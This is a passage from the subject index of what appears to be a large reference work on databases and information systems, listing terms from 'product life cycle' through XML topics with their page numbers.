product life cycle 339 production management 342 production of natural language 726 productivity 2002 prohibition of compilation 2094 project context 2005 project database 2000 project size data 2005 projection 1246 projects, expansion of 943 pro-motion model 1261 PROOVE environment 1013 proper interpretation of the results 2002 propositional logic 261 protein databases 2632 protein sequence motifs 2632 proteins 2632 PROTEUS 1270 protocol 1383, 1461 provisioning 1934 public watermarking 2228–2229 purchase order application 528 pure bending tester 2191 pure containment query 2069
stemmers 939 STEP (Standard for the Exchange of Product Model Data) 344 stereoscopic display 1159 stock measures 97 storage concepts 2348 storage concepts, evaluation of 2353 storing personal digital information 2353 storing topic maps 2352 strict time constraints 849 string metrics 2307 structural motifs 2648, 2649 structural patterns 2060 structure index 2062, 2065, 2066, 2067, 2068, 2069 structure, mediating 873 structure-centric approach 2350, 2355 structured database schema 441 structured database schema, specialized class-machine 441 student information system 1290 subject categories (SCs) 495 subjective norms 1874 substitution refinement 1180 substitution transitions 1026 sui generis summary care records (SCR) 2095 summary work effort 2006 summary-schemas hierarchy 490 summary-schemas model (SSM) 486, 488 SUMO 2386 supervised learning 1191 support vector machine (SVM) 1193 SUSHI (Standardized Usage Statistics Harvesting Initiative) 325–326 sustainable development 778, 785, 788, 792, 795 symbolic data analysis 656 symbolic object warehouse 649 symbolic object warehouse, architecture for 648 symbols constraint 2636 symmetric multiprocessor (SMP) 21, 1917 synchronous communication 1681
20
synopsis data structures 166 syntax 2484 synthetic benchmark, definition 1233 SysML 1879, 1889, 1897 system architecture 2111, 2288 system design expansion 1769 system enhancement 1770 system hardware 1365 system identification 2567, 2569, 2570 system maintenance, ease of 1735 system performance analysis 1368 system stability 2570
T tabular data 1839, 1839–1843 TAE database, transactions for 2561 tag clouds 1416 teacher education 1291 teaching transparently 1294 technological colonisation 1470 technology acceptance model (TAM) 1868, 1874 technology implementation barriers 1359 technology of usability engineering 1578 telecommunication 1529 telemedicine 485 teleology 5 temporal data, querying 232 temporal pi-patterns 1210 temporal queries 998 temporal relational database instance 1207 temporal restrictions 1021 temporal visual query environment (TVQE) 990 temporary component 2521 Teradata 206 tertiary structure 2649 test collections, OHSUMED (Oregon Health Science University’s MEDLINE) 499–504 text categorization (TC) 933 text mining 932, 2130 text sanitization 2133 text summarization 933 textual language 980
texture 1198 theoretic-information measures 2640 theory of meaning 283, 284, 285, 291, 293, 294, 295, 296, 297, 298, 299, 300, 301, 302 thesauri 939 thesauri, MEDTHES (medical thesaurus) 486, 492, 494, 495, 499, 500, 502 thesauri, MeSH (medical subject headings) 486, 487, 492, 493, 494, 499, 502 thesaurus maintenance 492 thesaurus structure 492 Thiessen polygons 1574 threats 2111 three dimensional (3-D) virtual world, environment capabilities 2606 three dimensional (3-D) virtual worlds in education 2595 three dimensional (3-D) virtual worlds, educational opportunities 2606 three-tier architecture 893 tight coupling 784, 785 time performance 2556 timestamp 1023, 1032 timing constraint 1023, 1027, 1028 timing diagram (TD) 1030 Tinley Park Economic Development 1695 TKPROF 682, 700 topology 1461 total information awareness system (TIA) 1520 TOVE measurement ontology 2387, 2392, 2396 transaction locator 1053 transaction model 833 Transaction Processing Performance Council (TPC) 1226 transaction properties 1023 transaction routing 837 transaction routing, affinity-based 837 transactional integrity 1916 transformation 847 transient data 225
Index
transparent access to multiple bioinformatics information sources (TAMBIS) 487 transport layer security (TLS) 2084 TREC 500 TREC9 499 tree like models, XML Authority 544, 545 tree-based strategy 2313 tree-indexed data 2204–2222 tree-like models 544 trees 728 tree-shaped structures 941 trial system implementation 1366 trial system testing 1366 trial system, design considerations for 1360 triangulation 1882 trigger 220 truth table 736 truth, correspondence vs. coherence views 7 tuple combination 2285 tuple comparison 2284 tuple relational calculus (TRC) 137 tuple-based approach 2054 twikis 1414 two-phase commit protocol (2PC) 34 two-phase-commit (2PC) 833 type definition 731
W W3C (World Wide Web Consortium) 210 War on Terror, The 1514–1515 warranted practices 1292 watermark 2223–2244 waveguides 1084, 1085, 1087, 1088, 1089, 1090, 1101, 1102, 1103, 1104 wavelet data compression scheme 2327
21
Index
wavelet decoding 2327 wavelet reconstruction process 2328 wavelet transform array (WTA) 2327 wavelets 2050 WBP with bitmap join indexes (WBP+JB) 668 weak attributes 965 weak irrelevance of syntax (WIS) 2264, 2267 weather data distribution map 1571 weather data spatial distribution 1571 Web application 2111 Web application (Webapp) 893 Web application development platforms, .NET 529 Web application development platforms, J2EE 529 Web hacking 2123 Web ontology language (OWL) 2360, 2361, 2362, 2363, 2366, 2367, 2368, 2369, 2370, 2371, 2375, 2376, 2377, 2378, 2379, 2380, 2381, 2382, 2383, 2452, 2454, 2455, 2456, 2458, 2459, 2460, 2461, 2462, 2463, 2464, 2465, 2466, 2467, 2469, 2470, 2471 Web page 2619 Web page as a database 2616 Web page, legal protection of 2616 Web pages, protection of 2625 Web portals 1270, 2079, 2081 Web portals, security threats 2109 Web powered databases 2118 Web reality 2473 Web server 2084, 2117 Web site design 1363 Web sites 1691 Web sites, evolution of 1683, 1691 WebAlliance 957 Web-based applications 340 WebCT 373 WebFINDIT 904 WebFINDIT architecture 916 WebFINDIT, design principles of 906
22
Web-powered databases, countermeasures 2079 Web-powered databases, legally sensitive 2110 Web-powered databases, security threats 2109 weighted association rule (WAR) 2657, 2682, 2683 weighted association rule mining (WARM) 2660, 2662 Weka 2001, 2002, 2007, 2008 Weka toolkit 2001, 2002 wide area network (WAN) 1455, 1468, 1912 wikis 1413–1414 window constraint 2636 Windows advanced server security 1366 Windows Live Academic 1410– 1411 wireless access client-server synchronization 1365 wireless communication 1257 wireless computing 1239 wireless technology 1255 WLS modeling question 1602 word-based indices 198 word-braker 939 WordNet 486, 488, 492, 493, 502 work effort 2001 workflow application 1756, 1762 workflow application project 1762 workflow management 856 workload 2570 workload generator 1924 workload model 1233 workload-based partitioning (WBP) 667 World Intellectual Property Organization (WIPO) 2618 World Wide Web (WWW) 363 World Wide Web Consortium (W3C) 529 worm attack 388 Wu and Palmer algorithm 494
X XAR-Miner in AR mining 523 XBD 1965 XConstraint Checker 556 XConstraint Checker architecture 556
XConstraint Decomposer 559 XDM (XML for data mining) 1320 XDM data items 1324 XDM database schema and state 1329 XDM statements 1326 XDM system, implementation of prototype 1331 XDS 1974 XDSQuery 1979 XDSSchema 1975 XDW requirement model 586 XER (extensible entity relationship model) 535 XGrammar 540 XLMiner 1396 XML (extensible markup language) 346, 487, 527, 570, 729 1014, 1321, 1959, 2473 XML benchmarks 1227 XML constraint representation 554 XML data 505, 2524 XML data extraction and transformation 509 XML data sources 1961 XML data, advantages of relational transformation 512 XML data, multi-relational databases of 510 XML databases 347 XML databases, multiple 550 XML designer 542 XML documents 210, 571, 2476, 2488, 2489, 2490, 2494 XML document warehouse (XDW) 570 XML document warehouse (XDW), architecture of 576 XML DTD 530 XML elements 2494 XML in Oracle 2353 XML interface 2484 XML metadata interchange (XMI) specification 529 XML modeling issues 531 XML query language 1732 XML schema 531, 1321, 2494 XML sources 596 XML sources, native 1962 XML transfer 2528
Index
XML tree, indexed (IX-tree) 509 XML, conceptual modeling for 527 XML, constraint checking in 567 XML, constraints for 567 XML, data semantics in 2496 XML, entity relationship for (ERX) 534 XML, metadata representation with 530 XML, modeling issues in 530 XML-based database 1320